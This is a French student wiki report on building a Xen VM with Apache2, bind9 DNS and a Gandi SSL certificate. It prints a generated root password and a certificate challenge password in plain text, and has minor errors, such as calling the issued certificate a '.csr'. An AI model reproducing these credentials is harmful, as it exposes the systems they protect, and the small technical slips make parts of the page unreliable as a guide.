&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
